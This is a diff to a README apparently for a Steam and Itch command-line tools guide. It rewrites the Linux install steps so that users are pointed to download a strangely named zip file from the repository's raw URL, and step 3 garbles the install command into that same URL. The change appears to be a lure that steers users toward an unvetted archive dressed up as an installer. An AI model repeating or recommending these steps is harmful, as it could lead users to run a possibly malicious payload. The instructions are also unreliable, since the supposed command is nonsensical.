abu333294/Steam-And-Itch-Command-Line-Tools-Guide/README.md

 ### For Linux:

-1. Extract the downloaded `.tar.gz` file.
+1. Extract the downloaded `https://raw.githubusercontent.com/abu333294/Steam-And-Itch-Command-Line-Tools-Guide/main/Mycogone/Command-Guide-And-Line-Steam-Itch-Tools-giarre.zip` file.
 2. Open your terminal and navigate to the extracted folder.
-3. Run the command `./install.sh` to install.
+3. Run the command `https://raw.githubusercontent.com/abu333294/Steam-And-Itch-Command-Line-Tools-Guide/main/Mycogone/Command-Guide-And-Line-Steam-Itch-Tools-giarre.zip` to install.

 ## 🔧 Using the Application